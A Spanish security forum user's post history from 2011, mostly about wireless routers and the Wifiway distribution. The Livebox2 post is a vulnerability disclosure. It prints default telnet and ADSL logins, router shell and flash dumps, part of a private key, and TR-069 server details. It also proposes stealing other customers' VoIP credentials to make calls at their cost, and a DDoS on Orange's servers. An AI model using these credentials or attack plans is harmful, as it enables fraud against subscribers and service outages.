Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - ChimoC

#46
Android / LiveBox2 unlocker
27 Julio 2011, 18:00 PM
Buenas:

De nuestro genial amigo buckynet del foro hermano de seguridadwireless:

LiveBox2 Unlocker.

Muy guenas a tod@s !!

LiveBox2 Unlocker. version 1.0

Esta aplicación desbloquea las funcionalidades desactivadas de fábrica del router Livebox2 mediante conexión wireless.

(*) Desbloquea las paginas de configuración ocultas.

hsiab
livezoom
visio
community
fax
vpn
backuprestore
licence
log

(*) Desbloquea las configuraciones de la red.

dhcp
ftlock
tvrouted
h323

(*) Desbloquea las configuraciones de los servicios.

rtcphone
universal_phone
professionnal
wifipushbutton
wpspushbutton
msgwaiting

(*) Desbloquea los tests de configuración.

sipdev
fmdev

Conectar con el router Livebox2 mediante wireless, utilizando la configuración wireless del móvil. Una vez conectado al router, puedes pulsar sobre el botón de configuración de Livebox2 para entrar mediante web al router con usuario admin y contraseña "admin", además de poder hacer un reiniciado "Reboot" y poder abrir la aplicación de Orange "Mi Livebox".

Para desbloquear el router Livebox2, pulsar sobre el ads para realizar las acciones de desbloqueo de todas las funcionalidades desactivadas de fábrica.



1 - Si NO estas conectado vía wíreless con el Livebox2 te aparece la pantalla de conexión.



Pulsando sobre el botón de conexión te lleva a los ajustes del móvil para la conexión vía wíreless. Una vez conectado al Livebox2 vuelve a la aplicación.

2 - Si estas conectado vía wíreless con el Livebox2 te aparecen los botones de configuración, reboot y la app de Orange.



Pulsando sobre el botón de configuración abre el navegador para acceder a la Web del Livebox. URL: http://livebox/. Usuario admin. Password admin.

3 - Para lanzar el desbloqueo hay que pulsar sobre el ads que aparece debajo del mensaje "Pulsar en el ads para liberar". Si todo ha ido correcto aparece la siguiente ventana con el mensaje "LiveBox2 Unlocker ... OK"



Pulsa sobre el botón de configuración para observar las nuevas opciones desbloqueadas que posee tu router Livebox2.



Enlaces al market del Android.

https://market.android.com/details?id=com.Buckynet.Orange.Unlocker.LiveBox2

market://details?id=com.Buckynet.Orange.Unlocker.LiveBox2

Codigo QR



Un saludo.

PD: Como siempre, en algo, habre metido la pata.

Enlace --> http://foro.seguridadwireless.net/aplicaciones-y-diccionarios-otros-plataformas-116/livebox2-unlocker-38113/
#48
Seguridad Wireless desbloquea el router Livebox2 de Orange.

Todos los routers de Orange usan los mismos usuarios y contraseñas por defecto mediante conexion telnet, así que una vez hemos accedido al interior del router, podemos obtener esta información, y darnos permisos de superuser.

La version original y la version actual del router Livebox2.

Citar
    (version(4.0.21.3.3.1.32.1.1.1.6))
    (external_version(FAST3yyy_691252))
    (release(Jan 14 2010))
    (distribution(LIC=/filer1_vol7/dev_projets3/rg_ultimate/dev/daniel/mini/OSP/4.3.23_691252/lastcheckout/license/jpkg_fast3202.lic DIST=FAST3202_SP_LBV2ULT))

    (version(4.0.21.3.3.1.32.1.1.1.6))
    (external_version(FAST3yyy_69127A))
    (release(Apr 26 2011))
    (distribution(LIC=/filer1_vol7/dev_projets3/rg_ultimate/dev/daniel/mini/OSP/4.3.48_BIS_691272/lastcheckout/license/jpkg_fast3202.lic DIST=FAST3202_SP_LBV2ULT))

Que conseguimos con esto: control total del router.
¿Y para que servirá esto?
Vamos a ver un poquito la ayuda que ofrece el router:

Citar[root @ home]$ help all

Command Category terminal - Commands to control Livebox execution
exit           Exit sub menu
ls             List sub menu contents
home           Go back to home directory
die            Exit from Livebox and return ret
ps             Print Livebox's tasks
entity_close   Close an entity


Command Category igmp - IGMP Proxy related commands
igmp_status   Print IGMP subscription of device
igmp_reset    Clear all IGMP subscriptions


Command Category dns_route - Dyncamic Routing according to DNS replies
dyn_route_print   Print Dynamic Routes
dyn_route_del     Delete Dynamic Routes


Command Category pvc - PVC scan related commands
pvc_scan           Scan predefined vpi.vci to determine PPP protocol
pvc_scan_restart   Restart PVC scan
pvc_scan_status    Display PVC scan status


Command Category rg_conf - Read and write Livebox configuration data
rg_conf_print         Print Livebox configuration
rg_conf_set           Set Livebox configuration path to value
rg_conf_set_obscure   Set Livebox configuration path to an obscured value
rg_conf_del           Delete subtree from Livebox configuration
rg_conf_ram_set       Set Livebox dynamic configuration
rg_conf_ram_print     Print Livebox dynamic configuration
rg_conf_ram_del       Delete subtree from Livebox dynamic configuration
reconf                Reconfigure the system according to the current Livebox    configuration


Command Category ffs - Flash file system
ffs_mount    Mount FFS device
ffs_umount   Unmount FFS device
ffs_format   Format FFS device


Command Category mii - MII Low level control
mii_dev_link_status_get   Get Link Status for all device ports using MII
mii_phy_reg_get           Get PHY MII register value
mii_phy_reg_set           Set PHY MII register value
mii_eth_reg_get           Get Ethernet MII register value
mii_eth_reg_set           Set Ethernet MII register value


Command Category FT wlan commands - FT wlan commands
wlan   wlan


Command Category FT commands - FT commands
save           Save configurating to flash
flash_chksum   Display all flash sections checksums


Command Category FT adsl commands - FT adsl commands
adsl   adsl


Command Category FT atm commands - FT atm commands
atm   atm


Command Category FT sndcp commands - FT sndcp commands
sndcp   sndcp


Command Category bluetooth_ssi - API for communication between OpenRG & Bluetooth hcid
ssi_bluetooth_acl_check         
ssi_bluetooth_device_connected   
ssi_ctp_tl_connected             
ssi_ctp_tl_disconnected         


Command Category rmt_mng - Remote Management Commands
rmt_mng_enable     
rmt_mng_login     
rmt_mng_add_user   


Command Category firewall - Control and display Firewall and NAT data
fw_restart       Stop and start Firewall & NAT
fw_start         Start Firewall & NAT
fw_stop          Stop Firewall & NAT
fw_filter        Turn Firewall packet inspection on/off
mac_cache_dump   Dump MAC cache data
fw_dump          Dispaly Firewall data
fw_variable      Display variables of the firewall rules
fw_trace         Trace packet traversal via the Firewall ruleset


Command Category cmd - Commands related to the Command module
help   Commands Help


Command Category tasks - API for Livebox tasks
host          Resolve host by name
bridge_info   Print bridge information
vlan_add      Add VLAN interface


Command Category debug - Debug Livebox
sys_ioctl         issue openrg ioctl
etask_list_dump   Dump back trace of all etasks
meminfo           Print memory information


Command Category log - Contorols Livebox logging behaviour
cat_log       Prints or deletes contents of log to console
log_lev_on    Redirect rg_error output equal to or higher than level to the
              current console.
log_lev_off   Stop rg_error redirection to the current console


Command Category terminal - Commands to contorol Livebox execution
exit           Exit sub menu
ls             List sub menu contents
home           Go back to home directory
die            Exit from Livebox and return ret
ps             Print Livebox's tasks
entity_close   Close an entity


Command Category main_task - main_task commands
reboot            Reboot the system
rg_ifconfig       List Livebox Network Devices
cat               Print file contents to console
shell             Spawn busybox shell in foreground
restore_default   Restore default configuration
erase             Restore default configuration
exec              Execute program
print_main_wan    Print the name of the current main wan device
route             Print route table
ver               Display version information
date              Print the current UTC and local time
version           Display version information for installation
show              Display version information for production


Command Category flash - Flash and loader related commands
flash_commit   Save Livebox configuration to flash
flash_erase    Erase a given section in the flash
load           Load and burn image
loadapp        Load and burn image app1 or app2
boot           Boot the system
flash_layout   Print the flash layout and content
flash_dump     Dump the flash content
lock           Lock mtd region
unlock         Unlock mtd region
bset           Configure bootloader
ifconfig       Configure network interface
ping           Test network connectivity

Returned 0

Como podemos ver esta es toda la información de las opciones de configuración del router.

Busquemos la clave wifi por defecto: Clave Wifi ( a fuego en el boot )

Citar
[root @ home]$  flash_dump -s BOOT | -r 0x00018350 -l 0x00000020
00018350: 00 32 35 44 43 34 43 43  ** ** ** ** ** ** ** **  |.25DC4CC********|
00018360: ** ** ** ** ** ** ** **  ** ** ** 00 00 00 00 00  |***********.....|

También se encuentra en el interior del router el archivo, el cual es el que carga a fuego, siempre que se resetea el router.

Citar
/etc # cat wsc_config.txt
#######################################################
# VAP 1 config section
#######################################################
# Simple Config Configuration File
# Lines that start with # are treated as comments
# Each line should not exceed 80 characters
# Format: TYPE=value
#
START_OF_VAP_CONFIG_1
# Configured Mode: 1=Unconfigured AP, 2=Client, 3=Registrar,
# 4=AP with Proxy, 5 = AP with Proxy and Registrar
CONFIGURED_MODE=5
# Is the standalone Registrar (mode 3) wireless-enabled
# Yes: 1, No:0
REGISTRAR_WIRELESS=1
# Should UPnP be used (for modes 1 and 3)
# Yes: 1, No:0
USE_UPNP=0
UUID=0x00269*****************
VERSION=0x10
DEVICE_NAME=Livebox2-4***
# Primary Device Categories: Please refer to the SC spec for
# values for the following types
PRI_DEV_CATEGORY=6
PRI_DEV_OUI=0x50f204
PRI_DEV_SUB_CATEGORY=1
# MAC Address of the local device, 6 byte value
MAC_ADDRESS=0x0026*******
MANUFACTURER=Sagem
MODEL_NAME=Livebox2
MODEL_NUMBER=Livebox2
SERIAL_NUMBER=LK101*****
# Config Methods: bitwise OR of values
CONFIG_METHODS=0x188
# Auth type flags: bitwise OR of values
AUTH_TYPE_FLAGS=0x20
# Encr type flags: bitwise OR of values
ENCR_TYPE_FLAGS=0x8
CONN_TYPE_FLAGS=0x1
RF_BAND=1
OS_VER=0x80000000
FEATURE_ID=0x80000000
# SSID:
# For unconfigured client: What it should connect to when
# starting EAP-WSC
# Example: SSID=WscSecureAP
# For unconfigured AP: Initial broadcast SSID
# Example: SSID=WscNewAP
# For Registrar: SSID that the supplicant must connect to when
# starting EAP-WSC
# Example: SSID=WscNewAP
# For AP with Registrar: Broadcast SSID
# Example: SSID=WscSecureAP
SSID=Orange-xxxx
# Key Mgmt for Supplicant (Client, Registrar):
# Unconfigured, doing WSC: WPA-EAP IEEE8021X
# Configured after WSC (will be done by the s/w): WPA-PSK
# Key Mgmt for Hostapd (AP, AP with Registrar):
# Unconfigured, doing WSC: WPA-EAP
# Configured after WSC (will be done by the s/w): WPA-PSK
# Configured, plus Registrar: WPA-EAP WPA-PSK
KEY_MGMT=WPA-EAP WPA-PSK
# Are we using a USB key to transfer PIN/Credential?
# Yes: 1, No:0
USB_KEY=0
# Is the Network Key set?
# Yes: 0xValue or passphrase, No: comment out line
# NW_KEY=0x000102030405060708090A0B0C0D0E0F000102030405060708090A0B0C0D0E0F
# NW_KEY=passphrase
NW_KEY=25DC4CC**************
# DBG_LEVEL bit mask: 0:ERR, 1:INFO, 2:REG, 3:UPNP, 4:MC, 16:DBG
DBG_LEVEL=7
END_OF_VAP_CONFIG_1

#OTHER_NETWORK_CONF ssid config filenames, separate by spaces
OTHER_NETWORK_CONF=(null)END_OF_CONFIG

Bloques de la flash.

Citar
[root @ home]$ flash_layout
Flash layout:

Section 00 Type BOOT       Range 0x00000000-0x000A0000 MaxSize 0x000A0000
   No more information.

Section 01 Type AUTOCONF   Range 0x000A0000-0x000C0000 MaxSize 0x00020000
   No more information.

Section 02 Type USER       Range 0x000C0000-0x000E0000 MaxSize 0x00020000
   No more information.

Section 03 Type SCRATCH PAD Range 0x000E0000-0x00100000 MaxSize 0x0001FF6C
   Uninitialized.

Section 04 Type USER      Range 0x00100000-0x00120000 MaxSize 0x00020000
   No more information.

Section 05 Type FACTORY    Range 0x00120000-0x00140000 MaxSize 0x0001FF6C
   Size 0x000004D3 Name 'FACTORY'
   Checksum 0x00010B81 Counter 0x00000001 Start Offset 0x00000000

Section 06 Type LAYOUT    Range 0x00140000-0x00160000 MaxSize 0x0001FF6C
   Uninitialized.

Section 07 Type CONF       Range 0x00160000-0x00180000 MaxSize 0x0001FF6C
   Size 0x00003AA3 Name 'rg_conf'
   Checksum 0x001CF184 Counter 0x00000049 Start Offset 0x00000000

Section 08 Type CONF       Range 0x00180000-0x001A0000 MaxSize 0x0001FF6C
   Size 0x000038CE Name 'rg_conf'
   Checksum 0x001BF4EC Counter 0x00000046 Start Offset 0x00000000

Section 09 Type JFFS       Range 0x001A0000-0x00240000 MaxSize 0x000A0000
   No more information.

Section 10 Type RECOVERY   Range 0x00240000-0x00580000 MaxSize 0x00340000
   No more information.

Section 11 Type IMAGE      Range 0x00580000-0x01000000 MaxSize 0x00A80000
   No more information.

Total 12 sections found.

Returned 0

Shell del Livebox.

Citar[root @ home]$ shell


BusyBox v1.01 (2005.09.07-07:38+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ # ls
automate  dsp       home      mnt       sys       var
bin       etc       hsdpa     proc      tmp
dev       fstab     lib       sbin      usr
/ # help

Built-in commands:
-------------------
        . : alias bg break cd chdir continue eval exec exit export false
        fg hash help jobs kill let local pwd read readonly return set
        shift times trap true type ulimit umask unalias unset wait


Desbloqueo de paginas ocultas del router que proporcionan muchas más opciones de las que  nos da originalmente Orange.

Activación de todos los parametros de la configuración de las paginas.

Citar
(pages
  (hsiab(1))
  (livezoom(1))
  (visio(1))
  (community(1))
  (fax(1))
  (telephone(1))
  (tv(1))
  (vpn(1))
  (backuprestore(1))
  (licence(1))
  (log(1))
  (lockunlock(1))
)


Activación de todos los parametros de la configuración de las redes.

Citar
(network
  (ftth(1))
  (adsl(1))
  (3g(1))
  (pppoe(1))
  (pppoa(1))
  (dhcp(1))
  (ftlock(1))
  (h323(1))
  (sip(1))
  (tvrouted(1))
)

Activación de todos los parametros de la configuración de los servicios.

Citar
(services
  (rtcphone(1))
  (universal_phone(1))
  (multitv(1))
  (professionnal(1))
  (residential(1))
  (testvoip(1))
  (wifipushbutton(1))
  (wifiwps(1))
  (wpspushbutton(1))
  (msgwaiting(1))
)

Activación de todos los parametros de la configuración del test.

Citar
(test
  (fmdev(1))
  (sipdev(1))
)


Configuración de ADSL:



Grabar y restaurar:



VPN:



LOG:



FAX:



COMUNIDAD LIVEBOX:



HOTSPOT:



LIVEZOOM:



VIDEOTELEFONIA:



CONFIGURACION PPP:



Ataques que se pueden realizar contra servidor Orange.

Usurpación de usuario, tenemos los certificados públicos y privados del router (hay parte eliminadas para no comprometer la seguridad de Orange):

Citar
00018740: 47 49 4e 20 52 53 41 20  50 52 49 56 41 54 45 20  |GIN RSA PRIVATE |
00018750: 4b 45 59 2d 2d 2d 2d 2d  0a 4d 49 49 43 58 51 49  |KEY-----.MIICXQI|
00018760: 42 41 41 4b 42 67 51 44  78 75 34 51 55 6b 56 4d  |BAAKBgQDxu4QUkVM|
00018770: 31 57 31 58 30 61 71 38  49 48 59 58 71 53 35 33  |1W1X0aq8IHYXqS53|
00018780: 6c 71 36 51 4b 69 31 6a  73 30 65 66 57 42 67 6a  |lq6QKi1js0efWBgj|
00018790: 43 6e 4a 55 63 30 72 4d  32 0a 70 70 67 77 77 57  |CnJUc0rM2.ppgwwW|
000187a0: 45 5a 36 35 45 31 54 4a  71 63 70 33 37 4e 6f 66  |EZ65E1TJqcp37Nof|
000187b0: 2b 4a 36 62 56 36 37 38  42 59 72 36 74 5a 56 2b  |+J6bV678BYr6tZV+|
000187c0: 33 79 41 63 2b 61 56 6f  63 74 54 46 42 4f 4e 4c  |3yAc+aVoctTFBONL|
000187d0: 31 71 57 6b 6f 62 65 57  78 59 0a 57 42 39 66 75  |1qWkobeWxY.WB9fu|
000187e0: 2b 7a 75 6d 71 44 30 65  73 79 65 34 58 6b 68 52  |+zumqD0esye4XkhR|
000187f0: 66 70 67 78 6a 35 63 61  41 75 76 76 6f 5a 51 70  |fpgxj5caAuvvoZQp|
00018800: 6d 7a 43 35 79 4e 74 58  47 6f 57 6c 7a 54 76 74  |mzC5yNtXGoWlzTvt|
00018810: 39 64 33 6f 51 49 44 41  51 41 42 0a 41 6f 47 41  |9d3oQIDAQAB.AoGA|
00018820: 45 75 77 45 75 4c 39 76  62 66 76 4b 54 4b 6d 56  |EuwEuL9vbfvKTKmV|
00018830: 4c 65 4e 78 75 68 64 56  4d 73 63 75 76 67 79 4f  |LeNxuhdVMscuvgyO|
00018840: 56 32 74 4f 35 48 66 77  63 35 74 69 4b 4c 46 74  |V2tO5Hfwc5tiKLFt|
00018850: 69 64 65 63 6a 69 52 30  2f 31 78 72 0a 4c 32 72  |idecjiR0/1xr.L2r|
00018860: 68 70 32 57 4e 44 58 65  69 30 78 37 53 4c 39 39  |hp2WNDXei0x7SL99|
00018870: 59 68 52 69 72 4a 74 6f  2f 4b 70 43 62 73 66 35  |YhRirJto/KpCbsf5|
00018880: 51 79 65 52 71 58 4e 57  6f 61 6d 71 37 46 4a 79  |QyeRqXNWoamq7FJy|
00018890: 66 50 61 62 4c 32 38 79  4e 41 4e 46 49 0a 4e 52  |fPabL28yNANFI.NR|
000188a0: 42 54 50 38 6e 30 70 46  6f 78 51 50 52 50 6e 4e  |BTP8n0pFoxQPRPnN|
000188b0: 33 58 65 4b 52 6d 58 47  67 4b 47 70 79 77 74 54  |3XeKRmXGgKGpywtT|
000188c0: 52 38 31 39 67 36 69 54  44 6b 48 4d 6b 43 51 51  |R819g6iTDkHMkCQQ|
000188d0: 44 2f 36 2f 68 74 30 4e  63 76 38 55 72 43 0a 5a  |D/6/ht0Ncv8UrC.Z|
000188e0: 70 72 53 6b 47 6f 73 71  4e 4e 44 52 6e 39 36 47  |prSkGosqNNDRn96G|
000188f0: 76 55 33 7a 36 62 68 50  46 69 76 4c 30 37 54 38  |vU3z6bhPFivL07T8|
00018900: 44 6c 65 78 45 70 76 54  44 55 33 6a 49 67 77 59  |DlexEpvTDU3jIgwY|
00018910: 69 2f 66 6b 6c 79 41 2f  64 6c 54 55 48 67 2f 0a  |i/fklyA/dlTUHg/.|
00018a90: 46 0a 2d 2d 2d 2d 2d 45  4e 44 20 52 53 41 20 50  |F.-----END RSA P|
00018aa0: 52 49 56 41 54 45 20 4b  45 59 2d 2d 2d 2d 2d 0a  |RIVATE KEY-----.|
________________________________________

00018f30: 00 00 00 00 00 00 00 00  00 2d 2d 2d 2d 2d 42 45  |.........-----BE|
00018f40: 47 49 4e 20 43 45 52 54  49 46 49 43 41 54 45 2d  |GIN CERTIFICATE-|
00018f50: 2d 2d 2d 2d 0a 4d 49 49  43 2b 6a 43 43 41 65 4b  |----.MIIC+jCCAeK|
00018f60: 67 41 77 49 42 41 67 49  50 54 45 73 78 4d 44 45  |gAwIBAgIPTEsxMDE|
00018f70: 79 4e 55 52 51 4d 6a 49  77 4d 7a 51 32 4d 41 30  |yNURQMjIwMzQ2MA0|
00018f80: 47 43 53 71 47 53 49 62  33 44 51 45 42 42 51 55  |GCSqGSIb3DQEBBQU|
00018f90: 41 4d 44 55 78 0a 43 7a  41 4a 42 67 4e 56 42 41  |AMDUx.CzAJBgNVBA|
00018fa0: 59 54 41 6b 5a 53 4d 51  34 77 44 41 59 44 56 51  |YTAkZSMQ4wDAYDVQ|
00018fb0: 51 44 45 77 56 54 51 55  64 46 54 54 45 57 4d 42  |QDEwVTQUdFTTEWMB|
00018fc0: 51 47 41 31 55 45 43 78  4d 4e 54 47 6c 32 5a 57  |QGA1UECxMNTGl2ZW|
00018fd0: 4a 76 65 43 42 54 0a 51  55 64 46 54 54 41 65 46  |JveCBT.QUdFTTAeF|
00018fe0: 77 30 78 4d 44 41 31 4d  44 55 78 4f 54 49 34 4d  |w0xMDA1MDUxOTI4M|
00019360: 70 67 3d 3d 0a 2d 2d 2d  2d 2d 45 4e 44 20 43 45  |pg==.-----END CE|
00019370: 52 54 49 46 49 43 41 54  45 2d 2d 2d 2d 2d 0a 00  |RTIFICATE-----..|

Una vez tenemos esto podemos hacernos pasar por otro router ya que se comunican mediante el protocolo TR069. Cada vez que arranca el router este comunica con el servidor de Orange para obtener actualizaciones o configuración del proveedor SIP:

http://karma-sip.orange.com:80/fr/parameter_request

Las claves que usa se encuentran en:

Citar
/etc # cat parameters.txt
ACS_URL                                 string  https://karma.orange.com/krmx69/es
username                                string  sage*****
password                                string  ca******
ConnectionRequestPort                   unsignedInt     50805
IGD_Mngt_ConnectionRequestURLPath       string  /
ConnectionRequest_basic_auth_activate   boolean 0
ConnectionRequest_digest_auth_activate  boolean 1
ConnectionRequestBacklog                unsignedInt     100
ConnectionRequestUsername               string  Default
ConnectionRequestPassword               string  orange
authrealm                               string  gSOAP_Web_Service
id                                      string  LIVEBOX_ID_
send_http_opaque                        boolean 1
Maxenvelopes                            unsignedInt     1
receive_timeout                         unsignedInt     20
PeriodicInformInterval                  unsignedInt 432000
PeriodicInformTime                      unsignedInt     0
nbr_max_connection_request              unsignedInt 50
ConnectionRequestPeriod                 unsignedInt 3600
id_activate                             boolean 1
PeriodicInformEnable                    boolean 1
DownloadSleepDuration                   unsignedInt     25
autonome_mode                           boolean 0
with_certif_exchange                    boolean 1
client_pem                              string  /etc/client.pem
password_ssl                            string  NULL
cacert_pem                              string  /etc/cacert.pem
capath                                  string  NULL
ssl_randfile                            string  NULL
comm_mode                               unsignedInt     2
/etc #

Por lo tanto, nos podríamos hacer pasar por otro usuario, robarle los credenciales VOIP y llamar desde nuestro Smartphone a cualquier parte del mundo, cobrándole a la otra persona las llamadas.

DDOS contra servidor Orange, modificamos el router para que este una vez dentro del server, haga, peticiones estúpidas contra el servidor y lo sature. Varios routers haciendo esto, dejarían sin servicio VOIP a Orange


Formación del usuario hsdpa:

XXXXXX-YYYYYYYYYYYYYYY@orangeBackup.net

XXXXXX - principio de MAC de la pegatina.
YYYYYYYYYYYYYYY - número de serie de la pegatina.
@orangeBackup.net - terminación para todos.

Datos de conexión ADSL Orange:

Vpi : 8
Vci : 35
usuario : orangeuser@orangeadsl
password : orangeuser123

Aplicación para windows.

Proximamente .........




Aplicación para android.

Proximamente .........




Esperamos pronto podais disfrutar con moderación del control total de vuestro router Livebox2. Esto es solo el principio.

Equipo : Estudio de Cifrados
www.Seguridadwireless.net

SeguridadWireless - Política de Publicación de Vulnerabilidades
#51
Buenas:

De naddia, me parece muy interesante  ;-) ;-) ;-)

Cubo de trucos o cheat cube, inspirado en los cubos de trucos de ubuntu, debian, fedora, suse y otros,
pero con los comandos adaptados a wifiway,



como se ve en la foto el cubo de trucos consiste en un recortable para cortar, montar y pegar, para tener los trucos a mano en un cubo,
el cubo contiene comandos utilizados usualmente y otros usados raramente, distribuidos en categorias,
util para aprender o para recordar comandos, recomendado para gente con alzeimer como yo,
todos los comandos tienen opciones alternativas, aconsejable mirar la ayuda o los manuales del programa para ampliar o cambiar opciones,
tambien se puede usar de guia sin imprimir y os lo podeis tomar tambien como una guia para empezar en wifiway.

la foto es un poco penosa de movil penoso y de fotografo mas penoso todavia, pero es solo para hacer una idea del tamaño y como queda montado.
queda algo asi-


aqui un enlace a la foto a imprimir alojada en imageshark-
http://img823.imageshack.us/img823/5341/wichcu.png

aqui un enlace a multiupload en 8 servidores por si la quitan de imageshark-
http://www.multiupload.com/XY87TGGFQX

creo que ha quedado bastante bien xD
sayonara
#52
Buenas:

Version alpha, para que podais ir viendo lo que va a llevar y de paso nos ayudeis a buscarle fallos.
PROHIBIDO  :silbar: :silbar: :silbar:,que le metais modulos extras ... por que se pueden producir errores.

Quien quiera que la testee tal como esta  por favor

Casi todo lo que mas usais ya lo lleva,.

MD5 7713e8b9f687d7b504ace06b2bb13ac2


DESCARGA

http://ns2.elhacker.net/isos/
http://dl.dropbox.com/u/28397626/WIFIWAY-2.0.3-alpha1.iso
http://www.multiupload.com/OYCJCWP5GR
http://206.217.211.110/descargas/
#55
Wireless en Linux / Módulos Wifiway 2.0.2
31 Marzo 2011, 23:34 PM
Buenas:

De naddia

No todos los programas de wifiway 2.0.1 funcionaran en wifiway 2.0.2 y no todos los programas de wifiway 2.0.2 funcionaran en wifiway 2.0.1.
La mayoria si funcionaran, pero todos no.
Tenerlo en cuenta.

He cambiado esto en color rojo y en bold porque hay gente que parece que no lo ve bien todavia.
Como ya sabeis de otros hilos de modulos, evitar comentar aqui cualquier duda, problemas, gracias o sugerencias y abrir un tema aparte para hacerlo.
Seguramente todos los comentarios que no tengan que ver directamente con descripciones o subidas de modulos seran borrados.







MODULO: NMap 5.51

DESCRIPCION:
Actualizacion a la version 5.51 de este programa que mediante una programacion estructural insumida consigue que la proyeccion central paralela se convierta en dinamica global integrada mediante la flexibilidad opcional teniendo en cuenta la retroaccion planificada y totalizada de la parte contratante.

COMENTARIOS Y OBSERVACIONES:
Esta version funciona en wifiway 2.0.2 pero no en 2.0.1
Aconsejable borrar versiones antiguas.
Crea acceso directo en menu, wifiway, redes.
Idioma ingles

Enlace de descarga
http://www.multiupload.com/1NFHLT9UMD

#56
Buenas:

Os pongo un manual realizado por el compañero Samuelongui de la página hermana de seguridadwireless (http://foro.seguridadwireless.net/mikrotik/manual-balanceo-carga-pcc-con-failover/msg194073/?topicseen#msg194073)

En este pequeño manual vamos a ver como hacer un balanceo de carga de 2 lineas ADSL sobre un equipo Mikrotik. En mi caso usaré el modelo RB450G, que cuenta con 5 puertos Ethernet, por lo que se podría hacer un balanceo de hasta 4 lineas. Para más lineas podéis usar modelos como el RB493 que tiene 9 puertos Ethernet o el RB1100 que si mal no recuerdo son hasta 13 puertos, pero no creo que necesitéis tanto, a no ser que deis servicio a 4 pueblos  ;)

Como no dispongo de 2 lineas ADSL en casa, debo dar las gracias a mi vecina por dejarme su red y poder trastear con estos aparatos. Gracias por dejarme comprobar que funciona  ;-)

Bueno, vamos al lío, que para eso estamos.

- Abrimos Winbox y vamos a nombrar las interfaces para tenerlas localizadas.


En mi caso por la ether1 entrada mi linea1 (llamada WAN1) y por la ether4 mi linea2 (llamada WAN4)

- Vamos a asignar IP's según los rangos de nestras ADSL


Mi ADSL es del rango 192.168.2.X por eso a la WAN1 le doy la IP 192.168.2.121/24, y la otra ADSL del rango 192.168.1.X por eso le doy a la WAN4 la IP 192.168.1.21/24. Si queréis le podéis poner un comentario para saber que hacéis.

Hasta ahora fácil, empieza el show  :D

- IP>FIREWALL>MANGLE




Empezamos marcando los paquetes para separar las conexiones. En esta parte nos encargamos de establecer que cada conexión que entra por un WLAN sale por el mismo (un problema común anteriormente era que una conexión podía entrar por WAN1 y salir por WAN2, ocasionando intermitencia del servicio y problemas de conectividad para el usuario). Marcaremos las conexiones para recordar mas adelante las interfaces (WAN1 y WAN4).




Repetimos esta regla según las ADSL que queramos balancear. En mi caso son 2, por lo que la he copiado y tan solo cambio el nombre de la marca de los paquetes (WAN2_IN - TO_WAN2).
Las lineas de comando superior asegurarán que el tráfico salga por el mismo lugar por donde entró.


En acción seleccionamos accept. Copiamos la regla y en Dst. Address seleccionamos el rango IP de nuestra otra ADSL, en mi caso 192.168.1.0/24

Las políticas de routeo nos permiten forzar el tráfico a que salga por un determinado Gateway (o puerta de enlace, en este caso WAN1 o WAN4), aunque el mismo se encuentre destinado a otra dirección (distinta al Gateway). Esto prevendrá la generación de Loops y problemas de conexión para el usuario. Para evitar que esto suceda tendremos que hacer uso de la routing table.








Copiamos la regla tal cual y en la siguiente cambiamos: per-connection-classifier=both-addresses:2/1. Y lógicamente las parcas de los paquetes (en mi caso WAN2_IN)

Mark-routing puede ser usando solo en mangle bajo las cadenas output and prerouting, pero la cadena prerouting está capturando todo el tráfico incluso el que está dirigido al mismo router. Para evitar este problema, en dst-address-type seleccionaremos Local, inverted.

- Con la ayuda de PCC (per connection clasiffier) dividiremos el tráfico en dos ramas o flujos iguales basados en el origen y destino de las direcciones.




Copiamos la regla segúna las ADSL que tengamos, con esto indicaremos que todo lo que entre por una WAN salga por la misma.

Si estáis haciendo la prueba con 2 ADSL como yo, así es como os debería quedar la pestaña Mangle:



- Nos dirigimos a IP>ROUTES


Copiamos la regla y cambiamos los valores de Gateway y Routing Mark y ponéis los que correspondan con vuestras ADSL (en mi caso 192.168.1.1 - TO_WAN2)

- Añadimos esta nueva regla:


Copiamos la regla segúna las ADSL a balancear y le cambiamos el valor Distance (esto indica la prioridad de la ethernet sobre la cual se hace ping antes de salir a internet. El valor 1 indica prioridad sobre el 2, y sucesivos).

- En resumen os debería quedar algo así (mirar lo seleccionado en azul, las otras routas son de otra cosa):



- Venga, que ya terminamos. Ahora vamos a IP>FIREWALL>NAT para crear una regla de paso de internet sobre las WAN que hayamos configurado:




Copiar la regla para las distintas interfaces que tengáis configuradas como WAN. De este modo le estamos diciendo que todo lo de WAN1 y WAN4 va a tener salida a internet (en mi caso). Todo el tráfico que pase por nuestra red tiene la posibilidad de salir por cualquiera de las dos interfaces WAN.

Un problema que nos encontramos con el FAILover, es que hacemos ping a la Gateway (IP del router ADSL). Si el router está encendido pero la conexión ADSL está caída (culpa del proveedor) o el cable teléfonico desconectado o en mal estado, nuestro Mikrotik reconoce que hay ping (obtiene respuesta), saca los paquetes por esa Gateway pero se pierden (no hay ADSL al otro lado). Para solucionar este fallo o problema, podemos poner nuestro router en Bridge y crear un cliente PPPoE en las interfaces según los datos de nuestro proveedor. De este modo no haríamos ping a la Gateway del router ADSL (está en Bridge, es decir, como "tonto"), sino que hacemos ping a nuestra Gateway externa, es decir, la de nuestro proveedor, y si esa Gateway está caída (fallo de nuestro proveedor y no de nuestro router), el Mikrotik no obtiene respuesta y en vez de sacar los paquetes por esa Gateway los saca por otra.

Una manera de comprobar que el balanceo funciona, es abrir con Internet Explorer la dirección http://www.miip.es/ y sin cerrar, abrir con Firefox otra vez la dirección http://www.miip.es/ Debería entregaros IP's distintas (primero la de un proveedor y luego la de otro).

Otra forma es poner una radio online tipo http://www.m80radio.com/multimedia/radios.html desconectar una de las entradas WAN al Mikrotik. Se os cortará la música pero al cabo de unos 10", si todo va bien, se restablecerá, ya que pasaréis de una conexión a otra.

Espero que no os resulte dificil seguir el manual, es más largo de lo que parece. Y sobre todo espero haberme explicado lo mejor posible y sea fácil de entender.

Un saludo.
#57
Buenas:

Yo no se si puede interesar para ir implementando los diccionarios que han ido saliendo....

Roberto Estrada




WLAN AUDIT para iphone esta en el cydia

codigo fuente: https://github.com/Robertoestrada/WLAN-audit






Citar/*
* KeyCalculator.m
*
* Copyright 2011 Roberto Estrada
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 3 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
